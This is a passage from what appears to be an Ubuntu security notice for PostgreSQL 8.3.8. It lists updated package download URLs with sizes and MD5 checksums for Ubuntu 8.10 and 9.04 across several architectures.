http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.8-0ubuntu8.10_all.deb\r\n Size/MD5: 1975242 70f19fc69824b5b4c3c0b3a97e51d633\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc_8.3.8-0ubuntu8.10_all.deb\r\n Size/MD5: 3416 a1a066265fdffc273fbbc61a372b3637\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql_8.3.8-0ubuntu8.10_all.deb\r\n Size/MD5: 240872 3cec9d88b5760aa418ca97c79e4067c9\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 11540 a8c779b71db598cf15c5002d3252d34b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 226306 bdfa67e258d02cf7d0530a4c9dea36fa\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 32766 e840bd71a1a18fd95f45167bb9d61f6e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 271160 491a9a0bbd653c39342763dd1afd4358\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 192294 c72732839a5801af7c45b7a9010ef3b1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 307090 17ecba7ee2eca31b86099d93c4ed893c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 3816854 51744da27ccc386501c844a89175ca7a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 768664 45d954b2e1cbc1eab2fcbd9aec69f30c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 374924 fa5dfecd5b8b1fae47a473a3ebe601d5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 268868 3252e062de12ed039771b33a9b89029f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 262936 b78a019aaa91c00142c0fe5f04b39ac5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 260420 84e7fcbf28cbee962de49fdc699e42f9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.10_amd64.deb\r\n Size/MD5: 812812 8d155a6cab29b3d0c5f8106ccba6507d\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 10688 739e14330f98a20fec94c7b7fec1ad51\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 216380 5e6b09215227da35d5950d94004786e4\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 32022 0844010a50891a2ed1369c7270397587\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 270432 46437ae789db05237cdec686b4fbc304\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 184358 7fa6d92ad613960a61d1c51bb14dd355\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 303012 7aaa61095af9ff93e506d86ac0f3640a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 3668740 4e2e0e10b6a3a6febf10943c6e32764d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 727290 706a5c7fe1c5133a0a1b0ff76bfdd5e9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 337206 09cd41299c1baa155171d4217e81396d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 266986 e813165179152ed8e223ce46dd37ddca\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 260702 2d3c38e4204854e51091157a287327fb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 259564 eac733c274f65e638e1a3d9cf9624d79\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.10_i386.deb\r\n Size/MD5: 808180 825e83a2cabbc1019ce41365e9e66d2f\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 10422 6640eb89daf896c56dbdb2b3c08e808a\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 216372 708660b2dea13a3d208b5b7ec9d1ae75\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 31230 9a6b2cda54549b978e4830578fc51865\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 269932 a0adb4f76b07f2794d9b7af32cc4bb60\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 181094 cb9f6952f1d9837f1862fa652a3f2c86\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 301764 2125c4137da3c1aaf79f5ea7ce394e32\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 3646462 b681269e9117f63568bbd8942b6051f1\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 721806 581a2e79caad7357ac60260b607041d5\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 333520 fc49096af24c17b2ad4a862d13ca7d35\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 267388 ca7981f7e9d194eed29f7bb96c65f982\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 260556 1e090fa7f09f0382e07508294223ff83\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 259444 a72408fe3c5e71197105c5c3fa67bcfb\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.10_lpia.deb\r\n Size/MD5: 807646 8cfbdbd6f423f72289bc90530031e63b\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 11242 a68f8b7ec244e196e33d828e8d0464d5\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 224148 8057156503cf8f8b62743019bf5980c8\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 33850 224d52c8301dc44ef14ca6bdcf7a06ae\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 273432 48ddf3caf94be67e51e2895843c3adec\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 190676 c65724ad6a9f41e21bb0dd4cafaa1235\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 305680 f538cb2c6d8bc491a6577efabe7ca71b\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 4186264 53a680d80b139cc0d58dee1019e8e58b\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 797496 3e23c8eb6d4fa8f90f94d1e222032c97\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 425206 ecd88b1e3675bbdaa6c531a54f737689\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 270066 5dad75eb672faf71b4c9b59586619820\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 264536 0ba6727c625df9714a4c315d1a994c77\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 262556 5fdbc9540c3dc09d3842ed4471fd2b0d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.10_powerpc.deb\r\n Size/MD5: 814568 42660ea92fe50e57d20e99bd5019578d\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 9856 95ee9c9e0204a9b5a7026362a70cc6b1\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 208306 f3ba866c1b9de6ae4dd08fd8eaada8ae\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 29434 bfe1ef4d6a56f46721d6350a1cf99b7f\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 267154 916bdfec642885d11c268b31991e9cff\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 179238 2c281c29c826dd3bf536ca2519abfee8\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 298556 ae4c3085be992b62bd24e31c12e17f04\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 3913536 e6d595c0cece2419363fecb0fa4f9f4f\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 720844 2d54864a2dca67f1f52da799ff5bc46d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 333834 0cfe4666d5fbc539aa890ad68dd2f395\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 265374 1e91aac890d2496c14d63e2a4f1674ee\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 259764 a73007ed133b87d80e66e2124f70d3a6\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 258626 884f6bfb555cedd7b6075de9a8868e1c\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu8.10_sparc.deb\r\n Size/MD5: 808454 6167e3b3fbaa9e5d1bd62514007c93f3\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu9.04.diff.gz\r\n Size/MD5: 66323 faef3614dd0942d59c56b0b58947f893\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu9.04.dsc\r\n Size/MD5: 1668 0fdfd05ff3795b4a70f191c6ad341e49\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8.orig.tar.gz\r\n Size/MD5: 13841845 14a82ab269c114d72986daf75129aabf\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client_8.3.8-0ubuntu9.04_all.deb\r\n Size/MD5: 241014 2395f7476f276bdebb2e30a1d360f407\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib_8.3.8-0ubuntu9.04_all.deb\r\n Size/MD5: 240912 7fd3b4334e45c1798cc3e096e3d4e662\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.8-0ubuntu9.04_all.deb\r\n Size/MD5: 1975410 087dbbfac0a40d040aae11ea5670f4f3\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc_8.3.8-0ubuntu9.04_all.deb\r\n Size/MD5: 3408 f1a0410c5de43e3440af57bb07f661cf\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql_8.3.8-0ubuntu9.04_all.deb\r\n Size/MD5: 241046 76c2e8a6f910c05c8ef9ca83e7e45cda\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 11542 584cd0264def7fbcb3ebd117d7e87900\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 226312 fd784b95452c6b3113716e7b70496b10\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 32772 843552ddc513aaf5f6e216e6f671ee6a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 271332 e4ef5f60376f27ec90f4039e1c400666\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 192302 767ddb663fa38a9971610aa766515d51\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 307232 f521acb738e35bf4d3cca5728b9f1af9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 3816894 23136a4f5116c38483cf847dba580731\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 768618 8ad3e05cef1610e3d59d8c9fddb698b4\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 374950 acfda634a38bff5e937adb6fc4ea8ea7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 813038 47b57c031e99139b3b9d47d19f23df95\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 269038 0d5c80faa77cd0230a68a8844fcbfa7f\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 262998 8e7e8c8fa19ad47f2da71eeb98fdc371\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu9.04_amd64.deb\r\n Size/MD5: 260602 daa81a2bde81e90a4fdf41eb1e2654ad\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 10696 eca98a534ad9bd35726ab5a41fb20f17\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 216382 78d5299f7b600a8f8b6050021096de65\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 32020 e9615858d6ad2ebcc24c199c66a88d3b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 270592 528b4cf2181e9e37286fa66acd94685e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 184356 cbb343ddfaab309cb64f355f88e5dc5e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 303162 68d95db01131f63ac5f86e79336b41b6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 3668646 5266b8e3efb892e7e9a5c0d2ffc46956\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 727272 1e4c9f08fb1318c771b159c9a3564ec7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 337242 221d03e7385a58ac87d44191ca2c1f51\r\n http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 808358 db5bc679aed65c0198d44ea9a279a149\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 267154 2b72374a61c8b909a25c0a1f6c700a0a\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 260796 c72d3e29a65398ac8f6ed25fc335db3b\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu9.04_i386.deb\r\n Size/MD5: 259740 3d1990c79f9703b623572ba1de86a570\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 10416 069c4da6121696764ad65c001ce8d669\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 216378 2ec4a19b0ad4333d99a15c2f72847c1c\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 31228 75643f24796cb7521483eb7ea435a09e\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 270100 46cd4062ad7026f464ee9771b070bff5\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 181102 f4d1967a9d5af8f812506a9b81ac3b04\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 301928 a0f32a0bf3ebc7983c70e11343851310\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 3646352 5c615d10f2cf908e8114d0ae95a89363\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 721816 a204abfcfdd570f5f7f895a5b8e924af\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 333490 14bdfa191c5f307ccc98e520812d41b7\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 807830 2d564de42aa5191abfde7862c1018944\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 267566 502195e0eee4038f974914a54c7415f1\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 260662 d21b94c3a9ced64463bca36f0db9e4bd\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu9.04_lpia.deb\r\n Size/MD5: 259638 92cbbf7ff30faa29077ae8f4ddc2c88d\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 11238 c1a1c781de3dabc0cf6d3c2bb599f609\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 224154 c18888026765114ff4be2365345c5de0\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 33846 fb12d7a4492d41675f0afe2a0bae16a4\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 273590 a29352522711181f86e3b0ee1a38a3a4\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 190668 baef9f56448e96d7e62b68f6227896f3\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 305838 cc4d988118b5d8c2241582b4048f9fad\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 4186362 702f2df7d954c9d74ae709dfdc4d64ca\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 797492 34366b52ed4f40649e33778084d07358\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 425176 1d735361983001b534835e34d7f7c38d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 814764 2230c7d33904261270259a54e84f743f\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 270236 094ca06c106bd6862be95328fdedcd67\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 264604 c9f52f3b35901d1959112a8f81c0f894\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu9.04_powerpc.deb\r\n Size/MD5: 262734 4f3e10623a42622b32a3dcd5e3b222fc\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 9818 f178e4bd653f0c9018900b665d2bc572\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 208260 8589ddb80d5dd60dd4b264b1c1236806\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 29406 661cf759fc0a3fed4c36f843cf2f14a7\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 267266 34e6343c3a8357763cea45600c4c37c2\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 179198 1ee1722632b0c16c3452e1d171f509b1\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 298708 bbcfaeb0772406c7b760393695f3e1a3\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 3912384 3a7a7015b7062bb5a6107aa713e9c07d\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 720318 80753ccf8ba549f858443f263505ff56\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 333188 63f15b1b3d8e4ebba7683b6ef854add3\r\n http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 808580 a7b5575880a24adec3d2183048f2a0f9\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 265492 d0e271ab19e0550d66199c839ba0e9a2\r\n http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 259804 e8d44adf404222d47f44aaef200f2468\r\n 